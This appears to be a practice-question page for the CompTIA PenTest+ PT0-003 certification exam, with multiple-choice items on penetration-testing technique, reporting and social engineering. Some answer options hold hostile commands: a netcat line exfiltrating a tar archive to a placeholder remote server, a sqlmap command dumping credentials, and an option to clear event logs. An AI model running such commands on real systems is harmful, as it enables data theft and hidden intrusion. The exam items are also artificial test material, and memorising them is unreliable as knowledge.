CompTIA PT0-003 CompTIA PenTest+ Exam Online Training
CompTIA PT0-003 Online Training
The questions for PT0-003 were last updated at Feb 20,2025.
- Exam Code: PT0-003
- Exam Name: CompTIA PenTest+ Exam
- Certification Provider: CompTIA
- Latest update: Feb 20,2025
During a security assessment, a penetration tester gains access to an internal server and manipulates some data to hide its presence.
Which of the following is the best way for the penetration tester to hide the activities performed?
- A . Clear the Windows event logs.
- B . Modify the system time.
- C . Alter the log permissions.
- D . Reduce the log retention settings.
A tester enumerated a firewall policy and now needs to stage and exfiltrate data captured from the engagement.
Given the following firewall policy:
Action | SRC
| DEST
| —
Block | 192.168.10.0/24: 1-65535 | 10.0.0.0/24: 22 | TCP
Allow | 0.0.0.0/0: 1-65535 | 192.168.10.0/24:443 | TCP
Allow | 192.168.10.0/24: 1-65535 | 0.0.0.0/0:443 | TCP
Block | . | . | *
Which of the following commands should the tester try next?
- A . tar -zcvf /tmp/data.tar.gz /path/to/data && nc -w 3 <remote_server> 443 < /tmp/data.tar.gz
- B . gzip /path/to/data && cp data.gz <remote_server> 443
- C . gzip /path/to/data && nc -nvlk 443; cat data.gz ‘ nc -w 3 <remote_server> 22
- D . tar -zcvf /tmp/data.tar.gz /path/to/data && scp /tmp/data.tar.gz <remote_server>
Which of the following elements in a lock should be aligned to a specific level to allow the key cylinder to turn?
- A . Latches
- B . Pins
- C . Shackle
- D . Plug
A penetration tester assesses an application allow list and has limited command-line access on the Windows system.
Which of the following would give the penetration tester information that could aid in continuing the test?
- A . mmc.exe
- B . icacls.exe
- C . nltest.exe
- D . rundll.exe
A penetration tester wants to use multiple TTPs to assess the reactions (alerted, blocked, and others) by the client’s current security tools. The threat-modeling team indicates the TTPs in the list might affect their internal systems and servers.
Which of the following actions would the tester most likely take?
- A . Use a BAS tool to test multiple TTPs based on the input from the threat-modeling team.
- B . Perform an internal vulnerability assessment with credentials to review the internal attack surface.
- C . Use a generic vulnerability scanner to test the TTPs and review the results with the threat-modeling team.
- D . Perform a full internal penetration test to review all the possible exploits that could affect the systems.
As part of a security audit, a penetration tester finds an internal application that accepts unexpected user inputs, leading to the execution of arbitrary commands.
Which of the following techniques would the penetration tester most likely use to access the sensitive data?
- A . Logic bomb
- B . SQL injection
- C . Brute-force attack
- D . Cross-site scripting
A penetration tester identifies an exposed corporate directory containing first and last names and phone numbers for employees.
Which of the following attack techniques would be the most effective to pursue if the penetration tester wants to compromise user accounts?
- A . Smishing
- B . Impersonation
- C . Tailgating
- D . Whaling
A penetration tester is compiling the final report for a recently completed engagement. A junior QA team member wants to know where they can find details on the impact, overall security findings,
and high-level statements.
Which of the following sections of the report would most likely contain this information?
- A . Quality control
- B . Methodology
- C . Executive summary
- D . Risk scoring
A tester completed a report for a new client. Prior to sharing the report with the client, which of the following should the tester request to complete a review?
- A . A generative AI assistant
- B . The customer’s designated contact
- C . A cybersecurity industry peer
- D . A team member
During an assessment, a penetration tester exploits an SQLi vulnerability.
Which of the following commands would allow the penetration tester to enumerate password hashes?
- A . sqlmap -u www.example.com/?id=1 –search -T user
- B . sqlmap -u www.example.com/?id=1 –dump -D accounts -T users -C cred
- C . sqlmap -u www.example.com/?id=1 –tables -D accounts
- D . sqlmap -u www.example.com/?id=1 –schema –current-user –current-db